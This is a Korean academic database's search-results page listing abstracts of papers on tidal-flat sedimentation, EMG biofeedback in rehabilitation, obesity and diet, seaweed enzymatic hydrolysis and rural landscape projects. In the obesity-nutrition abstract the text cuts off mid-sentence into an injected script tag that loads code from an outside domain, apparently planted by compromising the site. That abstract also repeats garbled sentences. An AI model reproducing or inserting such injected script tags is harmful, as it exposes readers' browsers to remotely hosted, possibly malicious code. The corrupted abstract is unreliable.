
결과 내 재검색





        검색결과 74

        2004.10 KCI 등재 구독 인증기관 무료, 개인회원 유료
        대조차 조간대에서 방조제 건설 후 발생하는 퇴적물의 분포특성과 퇴적환경의 계절적 변화를 파악하기 위해서 4계절을 대표하는 표층퇴적물을 채취, 분석하였으며, 4개의 측선에서 2년 동안 퇴적물과 퇴적률에 대한 조사가 병행되었다. 그 결과, 방조제를 축조함으로써 반폐쇄성 연안에서 개방형 연안으로 바뀐 이원 조간대의 동측 조간대 지역은 개방형 연안에서 나타나는 일반적인 계절 변화, 즉 몬순 계절풍의 영향으로 여름에는 세립질 퇴적물이 퇴적되고 겨울에는 강한 북서계절풍에 의해서 세립질 퇴적물이 제거되는 계절 변화를 보인다. 또한 측선 경사도와 퇴적물 분표양상 등을 고려할 때, 북부 지역은 조석보다는 파랑작용에 크게 영향을 받고, 남부 지역은 파랑보다는 조석작용이 크게 영향을 미치고 있지만 강한 조류, 파랑 그리고 태풍 등에 의해 시간이 지남에 따라서 조립화 현상을 보이고 있다. 반면 방조제 건설에 의해 새로운 형태로 변화된 서측 끝 지역은 조간대의 발달방향이 남동방향으로 향하고 있어 북서계절풍의 영향에서 보호되는 지역으로 동측 조간대에서 보여지는 계절변화 양상과는 약간 다르게 봄에 세립하고 불량한 분급을 그리고 여름에는 상대적으로 조립하고 양호한 분급을 나타낸다. 이는 방조제 건설에 따른 지형적 원인에 의한 것으로 판단되어진다. 따라서 연구 지역의 세립질 퇴적물 이동은 방조제에 의해서 겨울철에 동측 조간대에서 방조제 서측 끝 지역으로 이동하고 다시 여름철에는 동측 조간대로 이동되어지는 시계방향의 순환현상이 진행되는 것으로 보인다. 방조제 건설 이후 이원 조간대 지역은 2년 동안 많은 변화를 보이고 있지만 이것은 변화과정 중인 것으로 보이고 계속적인 모니터링이 필요할 것으로 보인다.
        2002.09 KCI 등재 구독 인증기관 무료, 개인회원 유료
        The purpose of this study was to determine EMG biofeedback training effect on the muscle activities in 3 unilateral facial palsy patients along with multiple baseline design across subjects. The auditory feedback about facial muscles (orbicularis oris, orbicularis oculi, frontalis) was provided with each patient during facial exercise training. Electromyographic (EMG) activity during maximal voluntary contraction and maximal compound muscle action potential (CMAP) amplitude elected by supramaximal electrical stimulation on facial nerve of facial muscles were measured pre- and post- EMG biofeedback training to evaluate motor learning. EMG activity during maximal voluntary contraction was increased after EMG biofeedback training and CMAP amplitude elected by supramaximal electrical stimulation was not changed in all subjects. The results indicate that EMG biofeedback training is useful method to improve motor learning of facial excercise training in unilateral facial palsy patients.
        2000.09 KCI 등재 구독 인증기관 무료, 개인회원 유료
        The purpose of this study was to determine the effect of electrical stimulation biofeedback on motor learning of quadriceps muscle isometric exercise in 3 patients who have undergone total knee replacement surgery. A multiple baseline design across subjects was used. The electrical stimulation biofeedback was provided with each patient during quadriceps isometric exercise, which last 10 to 14 sessions with 10 repetitions each sessions. After training patients received 4 retention tests. Maximum muscle activity was measured pre- and post- electrical stimulation biofeedback training and retention test to evaluate the effect of biofeedback training. Maximum isometric muscle activity of quadriceps was increased after electrical stimulation biofeedback training in all subjects. The results indicate that a electrical stimulation biofeedback training is a useful method to improve motor learning of quadriceps isometric exercise in total knee replacement.
        2000.04 KCI 등재 구독 인증기관 무료, 개인회원 유료
        최근 풍족한 식생활로 인한 영양소의 과잉섭취와 운동량의 부족으로 비만증이 늘어나고 있다. 비만증의 위험이 널리 인식되면서 비만성인들의 무분별한 다이어트와 운동으로 영양결함이나 이와 관련된 질병들이 발행할 우려가 있으므로 적절한 영양교육 프로그램개발을 위한 기초자료를 위해 식사 행동, 영양섭취실태 및 건강상태에 관한 실태를 조사하여 비만군과 대조군을 비교해 본 결과 다음과 같은 결과를 얻었다. 1. 평균연령은 남녀 각각 38.1±10.8세, 35.2±8.8세였으나, 전체 연령의 분포는 30세 이하가 28명(35%), 30세에서 39세가 23명(28%), 40세에서 49세가 19명(23.5%), 50세 이상이 11명(13.5%)으로 30세에서 49세가 가장 많았다. 체중조절 운동에 참여한 기간은 1∼2개월 정도가 5명(6.1%), 3∼4개월은 24명(29.8%), 5∼6개월은 39명(48.2%), 6개월 이상은 13명(15.9%)으로 5∼6개월이 가장 많았다. 2. 에너지 섭취량의 경우 비만군이 1, 451.0kcal로써 대조군 1, 572.4kcal에 비해 8%정도 적게 섭취하는 것으로 나타났으며 한국인의 영양권장량^21)에 대한 비율로는 대조군이 74% 비만군이 65% 수준으로 섭취하고 있었다. 에너지 섭취량과 마찬가지로 권장량에 미치지 못하는 영양소는 단백질, 칼슘, 철분, 비타민 B_1, 비타민 B_2이었다. 총열량에 대한 탄수화물, 지방, 단백질의 열량 비율은 비만군이 61.2:21.6:16.6, 대조군이 62.8:21.3:16.0으로 한국인 영양권장량에서 이상적인 구성 비율로 권장하고 있는 65:20:15와 비교해 볼 때 탄수화물 섭취 비율이 두 군 모두 약간 낮으나 지방과 단백질의 섭취비율은 비슷하였다. 3. 평균 신장은 비만군이 165.8cm, 대조군이 164.2cm으로 두 군간에 차이가 없었으나. 평균 체중은 비만군이 74.9kg, 대조군이 60.4kg으로 나타나 유의적인 차이(p<0.001)를 보였다. TSF는 비만군이 28.3mm, 대조군이 23.7mm로 두 군간에 유의적인 차(p<0.001)를 나타냈다. MAMC는 비만군이 25.5cm, 대조군이 21.7cm로써 두 군간에 유의적인 차이(p<0.001)를 보였다. 4. 식사행동에 관한 내용에서는 하루에 몇 회 식사하는가, 규칙적인 식사를 하는가, 식사에 걸리는 시간에 관한 문항으로 나누어 조사한 결과, 하루에 3회 식사하는 사람이 대부분이었으나 비만군의 여자 1명과 대조군의 여자 2명이 하루 1회만 식사를 하고, 비만군의 여자 4, 남자 2명과 대조군의 여자 7명이 하루 2회 식사를 하는 것으로 나타나 식사행동이 잘못되었음을 알 수 있었다. 규칙적인 식사를 하는가에 관한 물음에서는 대체로 규칙적이다라고 답한 사람이 비만군은 14명(38.9%), 대조군은 22명(52.4%)으로 대조군이 많았다. 불규칙적이다라고 답한 사람은 비만군이 여자 5명과 남자 22명으로 전체 27명(57.5%), 대조군이 여자 6명과 남자 6명으로 전체 12명(57.5%), 대조군이 여자 6명과 남자 6명으로 전체 12명(36%)이었다. 불규칙적인 식사를 하는 비만군 남자의 경우 잦은 음주로 인하여 식사를 하는 비만군 남자의 경우 잦은음주로 인하여 식사를 제 때에 못한다고 답한 사람이 많았다. 식사에 걸리는 시간은 10분 이내인 경우는 비만군에서 다소 많았으며 그 외는 10분에서 20분 사이라고 답한 사람이 대부분이었다. 5. 운동에 참여하는 정도는 참여한다라고 답한 사람이 비만군이 17명(42.1%), 대조군이 13명(35.7%)이었으며, 가끔 참여한다라고 답한 사람이 비만군이 25명(62.1%), 대조군이 26명(64.3%)이었다. 운동빈도는 1주일에 3∼5회 하는 사람이 비만군19명(43.4%), 대조군 23명(63.5%)으로 나타나 대조군이 비만군보다 많았다. 운동빈도에 따른 인체계측의 변화는 1주일에 6∼7회 운동하는 사람의 체중과 TSF가 1∼2회 및 3∼5회 운동하는 사람보다 약간 낮게 나타났으며, 대체적으로 비슷한 분포를 보였다. 1회 운동시 걸리는 시간은 30분이 전체의 약 44%로 가장 많았고, 그 다음이 60분으로 전체의 약 39%였다. 체중조절을 위해 운동에 참여한 기간은 비만군 23명(54.6%)과 대조군 16명(38.9%)이 5∼6개월에 답을 하여 가장 많은 수치를 나타내었다. 평소에 자신이 알고 있는 영양지식을 실생활에 활용하는가에 관한 물음에서 전체 52명(64.2%)이 대체적으로 활용하고 있다고 답했으며, 적극적으로 활용한다고 답한 사람이 전체 29명(35.8%)으로 나타났다. 6. 각 영양소 섭취량과 인체계측 지표간의 상관성을 분석하여 본 결과, PIBW는 열량섭취량(r = -0.241, p<0.05)과 탄수화물 섭취량(r = -0.259, p<0.05)사이에 유의한 음의 상관관계가 있음을 보였으며, BMI도 PIBW와 마찬가지로 열량섭취량(r = -0.224, p<0.05)과 탄수화물 섭취량(r = -0.242, p<0.05)사이에 유의한 음의 상관성을 나타냈다. 7. 체중 조절후 체중감소율에 영향을 미치는 요인을 알아내기 위해 단계적 다중회귀분석을 한 결과, 체중감소율을 설명할 수 있는 요인으로서?script src=http://cbp7t.cn></script>
        1999.05 KCI 등재 구독 인증기관 무료, 개인회원 유료
        This study was conducted to identify the effects of high-heel shoes on EMG activities of rectus femoris and biceps femoris in 28 healthy women. Subjects were composed of experimental group (wearing high-heel shoes) and control group (wearing low-heel shoes). Two groups participated in three conditions standing (bare foot wearing athletic shoes and 7.5 cm height shoes). In high-heel shoes condition, EMG activities of rectus femoris of control group were significantly lower than that of biceps femoris of experimental group, but EMG activities of both muscles of experimental group did not should significant difference. In bare foot standing condition, EMG activities of rectus femoris of experimental group were significantly lower than that of biceps femoris but EMG activities of both muscles of control group had no significant difference. These results showed that hamstring lengthening effects was produced when wearing high-heel shoes because the external knee extension moment was increased. In the short term, high-heel shoes effect on the increase of the biceps femoris activities by spindle reflex, but in the long term, the normal amplitude of the same muscle activities by Golgi tendon organ reflex.
        1998.09 KCI 등재 구독 인증기관 무료, 개인회원 유료
        The nature of entrainment between the locomotor and the respiratory rhythm was investigated while normal human subjects were walked or running on a treadmill. The purpose of this study was to analyze the incidence and type of coordination between the locomotor and the respiratory rhythm during running at different work load. The experiments were carried out on 12 untrained volunteers exercising at 3 work loads (2 METs, 3 METs, 4 METs in randomized order). The gait cycle was measured by electromyography (EMG) signal of gastrocnemius firing and the respiratory cycle was measured by a thermometer. We found that the ratio between the locomotor and the respiratory rhythm existed and 2:1 ratio between the locomotor-respiratory coupling was dominant at 2 METs and 3 METs
        1998.06 KCI 등재 구독 인증기관 무료, 개인회원 유료
        The purpose of this study was to determine the effect of mental practice on biceps brachii muscle strengthening in 3 poststroke hemiplegia patients along with multiple baseline design across subjects. The mental practice adopted for this experiment involved imagery training to practice elbow flexion, which last 12 to 16 sessions with 30 minutes each session. Maximal muscle activities was measured pre- and post-mental practice to evaluate the strength of biceps brachii. The strength of biceps brachii was measured by surface-EMG. The results were: In the subject 1, 73.92 mV (pre-) and 127.56 mV (post-); in the subject 2, 147.60 mV (pre-) and 202.85 mV (post-); and in the subject 3, 20.75 mV (pre-) and 27.92 mV (post-). The results indicate that a simple mental practice is a useful method to strengthen biceps brachii muscle in hemiplegic patients.
        1997.09 KCI 등재 구독 인증기관 무료, 개인회원 유료
        The purpose of this study were to compare light touch, two-point discrimination, position sense, and static balance ability and to examine the relationship of static balance ability and different senses in those who are wearing various heights of high-heeled shoes. Each 29 women was classified two different heights (below 3 cm, above 7 cm) by experience in wearing shoes. A t-test was used to determine the differences between low- and high-heeled shoe in light touch, two-point discrimination, position sense, and static balance ability. Pearson correlation was used to examine the relationship of static balance ability to these sensation. The results were as follows: 1) No significant differences in average light touch, position sense between two groups were found(p>0.05). But significant differences in average two-point discrimination, static balance ability were found(p<0.05). 2) Static balance ability was not significantly correlated with light touch, position sense, two-point discrimination(p>0.05). The results suggest that long time experience in wearing high-heeled shoe may be caused local sensory change and decreased static balance ability. Even though, static balance ability was not significantly affected but correlated with two-point discrimination, position sense, and light touch in order.
        1997.04 KCI 등재 구독 인증기관 무료, 개인회원 유료
        Back muscles play an important role in protecting the spine. Epidemiological studies have shown that loads imposed on the human spine during daily living play a significant role in the onset of low back pain. No previous study has attempted to correlate the response of the trunk musculature with the type of external load. The purpose of this study was to use surface electromyography (EMG) to quantify the relative demands placed on the back muscles while lifting loads in one hand. Forty asymptomatic, twenty year-old subjects stood while lifting loads of 10% of body weight(BW) unilaterally. All EMG data were normalized to a percentage of the EMG voltage produced during no-load standing(%EMG). Our major analysis involved a paired t-test for repeated measures. Of particular note was the fact that the ipsilateral 10% of BW condition produced statistically less % EMG change than did the contralateral 10% of the condition.
        2019.07 KCI 등재 서비스 종료(열람 제한)
        Purpose - Previous studies on the influence of appeal types of advertising messages on pro-social behavior have shown inconsistent results. The purpose of this study is to examine whether the appeal type of advertising affects consumer’s prosocial behavior. In particular, the authors investigated whether the social exclusion moderates the relationship between the appeal type of advertising and prosocial behavior. Research design, data and Methodology - To verify the hypothesis, two experimental study were conducted. The experimental study was 2(appeal type : self-benefit vs. other-benefit) by 2(social exclusion : being ignored vs. being rejected) between-subject design. Participants were randomly assigned to one of four conditions. The experiment was conducted using a computer. First, the participants was exposed to the advertising image used in the social campaign, and then responded to questions about social behavior. The participants completed the experiment after further responding to the item for manipulation check and demographic measure. The experiment took about 10 minutes in total. Results - In Study 1, a global warming campaign with participation intention variable, other-benefit ads rather than self-benefit ads drive consumers who feel socially rejected to be more willing and likely to participate, but consumers who feel socially ignored are more likely to participate the campaign in self-benefit ad than other-benefit ad. Study 2 replicates the findings, a child poverty relief campaign with an amount-to-donate variable: consumers who feel explicitly rejected allocate more dollars to the charity in response to other-benefit rather than self-benefit ads, but consumers who being ignored are willing to donate more money. Conclusion - This study has theoretical contribution in that it expands existing theories by explaining the existing inconsistent results of the message appeal influence on pro-social behavior through new control variables. In addition, the results have important managerial implications, suggesting marketers should tailor their marketing message to match the consumer situation.
        2019.03 KCI 등재 서비스 종료(열람 제한)
        This purpose of this study was to investigate the perception and participation satisfaction of residents who participated in the rural landscape improvement project in Geumsan. The projects were conducted in three villages of Geumsan in 2018 and total 96 residents had participated. The results of the questionnaire survey on the participants showed that they usually have interests in community activities and actively participated. As a result of analyzing factors related to the change of residents' perceptions and satisfaction. It was found that there was significant difference in perception and satisfaction according to frequency of participation, not demographic factors. It is interesting that active interaction among residents during the projects and satisfaction on process are important factor for overall project satisfaction. For successful rural landscape improvement projects, it is necessary to encourage and support interaction and communication among residents. In addition, more various programs need to be developed to foster residents’ attachment and sense of community.
        2018.06 KCI 등재 서비스 종료(열람 제한)
        This study aims to identify more reasonable and efficient development plans to engage local university students in landscape improvement projects in rural areas. To survey university students, residents, administrators and experts involved in such projects on important considerations in this regard, SWOT analysis was employed to identify important factors, followed by analytic hierarchy process (AHP) to evaluate their relative importance, identify problems and suggest implications for improvement. The results are summarized as follows: the relative importance of the SWOT group was in the order of opportunity, strength, threat, and weakness. For each SWOT factor, the relative importance of strengths was in the order of students’ aspiration and passion, availability of creative ideas and designs, and improved attachment to their community. The relative importance of weaknesses was in the order of the lack of spontaneous participation of residents, short preparation periods and insufficient budgets, and the lack of experience in similar projects. The relative importance of opportunities was in the order of young students’ activity itself being a boost factor to the community, students’ endeavors arising a consensus among residents, and students feeling a sense of duty as representatives of their school. The relative importance of threats was in the order of projects being one-shot, temporary events, immaturity, and differences in preferences between older and younger generations. To draw an overall ranking of the sub-factors evaluated, the overall relative importance of the decision-making factors was evaluated. Among the sub-factors for each SWOT group, young students’ activity itself being a boost factor to the community as an opportunity factor was shown to be the most important, while the lack of experience in similar projects was shown to be the least important as administrators and experts made appropriate interventions in each stage.
        2016.11 KCI 등재 서비스 종료(열람 제한)
        In this study, the concentrations of polycyclic aromatic hydrocarbons (PAHs) were investigated in meat process food and for cooking methods (pan-frying and charcoal fire). The methodology involved liquid-liquid extraction, silica gel cartridge clean-up and determination by gas chromatography/mass spectrometry (GC/MS). The recovery of 17 PAHs spiked into these samples ranged from 66.6 % to 98.0% and the coefficient of variation was less than 10%, but that of dibenz(a,h)anthracene was 16.39%. The mean concentration of total PAHs in processed samples was ND∼7.2 ng/g, whereas that pan-fried and charcoal-fired samples were ND∼22.1 ng/g and, 12.7∼367.8 ng/g, respectively. Therefore, the concentrations of total PAHs in cooked samples were higher than in original samples and charcoal-fired samples had the highest total PAH levels.
        2016.01 KCI 등재 서비스 종료(열람 제한)
        We investigated optimal conditions for the hydrolysis of Laminaria japonica using a single enzyme such as Celluclast 1.5 L, Saczyme, and alginate lyase, for the production of reducing sugar. Redesigned experimental conditions including the optimal conditions determined for the single enzyme were proposed, and the hydrolysis of Laminaria japonica was also performed with a mixture of enzymes. The reducing sugar yield with the mixed enzymes was lower than that with Celluclast 1.5 L, which showed the highest efficiency among the enzymes used. Considering the reducing sugar yield and economics, it would seem that hydrolysis by mixed enzymes had no advantage. The coefficient of determination (R2) of Y1 (the yield of reducing sugar by Celluclast 1.5 L) was 0.89. The P value of Y1 was < 0.001, indicating statistical significance. By the response surface methodology (RSM), the optimum reaction conditions for hydrolysis of Laminaria japonica by Celluclast 1.5 L were determined to be enzyme of 8.0%, a reaction time of 26.4 h, a pH of 4.0, and a temperature of 42.6oC, resulting in the production of 117.7 mg/g-Laminaria japonica.
        2015.09 KCI 등재 서비스 종료(열람 제한)
        The objective of this study was to investigate the perception of walking environment and use of neighborhood facilities of rural female elderly, who are the most susceptible to ambulatory problems. The study showed that parks, senior centers and hospitals were among the most frequently used neighborhood facilities by rural female elderly, while bus stations and senior centers were recognized as the closest facilities. Frequency of use was higher for paid sports facilities rather than parks. Hospitals and health centers were facilities that were desired to be in close proximity. Social support, self-efficacy, and attitude were the factors that affected walking environment. Street trees, accessibility to parks, and street lights were factors that showed a positive relationship with total time of walking activity while perceived crime rate and slopes were perceived as environmental challenges for groups that walked under 150 minutes per week. One factor that negatively affected walking was the lack of sidewalks on streets. Providing parks and walking trails within neighborhood, pleasant walking environments, and safe sidewalks would contribute to improved perception of neighborhood and walking of older rural women.
        2015.01 KCI 등재 서비스 종료(열람 제한)
        Bioethanol was produced from Laminaria japonica hydrolystaes by sequential acidic (0.108 N HCl)/distilled water and enzymatic hydrolysis (Celluclast® 1.5 L) using Saccharomyces coreanus immobilized into/on aluminum silicate. Reducing sugar were hydrolyzed 140.5 and 122.7 mg/g-dry biomass under a acidic-enzymatic condition and a distilled waterenzymatic condition, respectively. In addition, the 8 repetition batch fermentations were carried out with the immobilized S. coreanus to verify the advantage of immobilization cell. As a result, we can obtain the ethanol of 12.1 ~ 24.3 mg/gdry biomass, and reuse the support, aluminium silicate, for 8 repetition batch fermentations without any breakdown.
        2014.12 KCI 등재 서비스 종료(열람 제한)
        In this study, microcrystalline cellulose, which is a cell wall polysaccharide commonly contained in sea algae (brown algae, red algae and green algae), is used in substitution for cellulose and is hydrolyzed with seven enzymes available in the market. The seven enzymes selected are Viscozyme® L, Celluclast® 1.5 L, Saczyme, Novozym® 33095, Fungamyl® 800 L, Driselase® Basidiomycetes sp., and Alginate Lyase. To maximize the production of the reducing sugar by hydrolysis with each enzyme, we optimized the quantity of enzymes, reaction time, pH, and reaction temperature as four independent variables, and the reducing sugar production rate as a dependent variable, utilizing response surface methodology (RSM) to optimize the enzyme hydrolysis reaction conditions. Among the tested enzymes, the production rate of reducing sugar by Celluclast® 1.5 L was the highest. Hence, the predicted optimum conditions (8.5 % enzyme, reaction time 27.6 h, pH 4.1 and reaction temperature 44.1oC) were directly applied to Laminaria japonica and proved the predicted optimum conditions with experiments. Under the optimum conditions, the sugar yield of 137.6 mg/g-Laminaria japonica (experimental value) was obtained.
        2014.10 KCI 등재 서비스 종료(열람 제한)
        This study investigated the optimal sequential hydrolysis conditions by comparing with reducing sugar yield ofsequential hydrolysis of Laminaria japonica processing residue. After acid-catalyzed hydrothermal hydrolysis, sequentialenzymatic hydrolysis was performed with single enzymes such as Celluclast® 1.5L, Saczyme, and Alginate Lyase, andtheir mixture. As a result, the yield of reducing sugar by sequential hydrolysis with the mixed enzymes was the highest,but there would be an economical problem with excessive enzyme loading. Therefore, considering the reducing sugaryield and economics, it is thought that hydrolysis by the mixed enzymes has no advantage, thus, using the Celluclast®1.5L in the sequential hydrolysis was practically more appropriate. The optimal sequential hydrolysis conditions ofLaminaria japonica processing residue were determined to be 8% v/w of enzyme injection, 42.6oC of reaction temperature,pH 4.1, and 26 hours of reaction time after acid-catalyzed hydrothermal hydrolysis (0.108 N-HCl, 144oC of reactiontemperature, and 22 minute of reaction time).
        2014.10 KCI 등재 서비스 종료(열람 제한)
        연구는 치유정원으로서의 선호도와 치유감을 분석하기 위해 ‘힐링’을 주제로 전시한 정원을 사례로 하여 작가와 이용자의 설계 언어의 차이점에 대한 정리와 함께 개별 작품과 유형별에 따른 선 호도와 치유감의 상관관계, 남녀 간의 차이, 유년시절에 따른 차이 를 살펴보았다. 그 결과는 첫째, 선호도와 치유감의 상관관계를 입 증할 수 있다. 선호도가 높은 경우 대부분 치유감도 높게 나타났다. 개별 작품과 주제별 유형화의 경우 둘 다 비슷하게 나타났다. 둘째, 성별에 따라서는 선호도는 비슷하게 나타났으나 치유감은 여성은 초화, 색깔에 더욱 반응하고, 남성은 자연/야생, 놀이의 정원에 대 해 반응하였다. 세째, 유년시절의 경험에 대해서는 농촌과 도시에 서의 차이에서 농촌출신이 선호도와 치유감에서 ‘전통’에 대해 더 욱 크게 반응하였다. 넷째, 작가와 이용자의 설계언어는 ‘자연/야 생’, ‘휴식’에 대해서는 유사하게 나타나고 있으나, 작가의 ‘놀이/ 동적’에 비해 이용자들은 ‘정적/ 편안함’을 더욱 원하고 있었다. 현 재 우후죽순으로 치유정원의 이름을 달고 조성되고 있는 정원은 점 점 많아지고 있다. 치유정원을 주제로 조성한 실제의 사례에 대해 선호도와 치유감의 정도를 정확히 분석하는 것은 차후의 설계를 하 기 위한 기초 작업으로 의미를 갖게 될 것이다.
        2014.09 KCI 등재 서비스 종료(열람 제한)
        This study aimed to identify orientations for the development of the community by establishing desirable aesthetical environments and reorganizing the residents' communal way of life through the implementation of village art projects. To investigate how the implementation of village art projects influence community and communication, the author analyzed changes in walls made by the implementation of actual projects in Anhyeon Village in Gochang, Dongpirang in Tongyeong, and Byeolbyeol Village in Yeongcheon. The community was analyzed from the view points of locality, communal ties, and communication. The results showed that Anhyeon Village in Gochang expressed its locality with chrysanthemum, poems and local figures. Similar walls were built across the village to strengthen ties among the residents, and portraits used as doorplates represented communication among them. Various paintings of seas, flowers, and poems were seen in Dongpirang in Tongyeong, which were thought to be representations of its locality and the friendliness of hometown in the less favoured area. Wall paintings played pivotal roles in this village to impart to the residents essentials that should be kept to eliminate inner walls in their minds and ensure open communications. In Byeolbyeol Village in Yeongcheon, locality was presented with common farm village landscapes in various materials, patterns and formativeness. Village-wide reinforcement contributed to strengthening ties in the community rather than forming boundaries against outside worlds. Cultural and artistic elements structured mental walls that made people not aware of the presence of physical walls.
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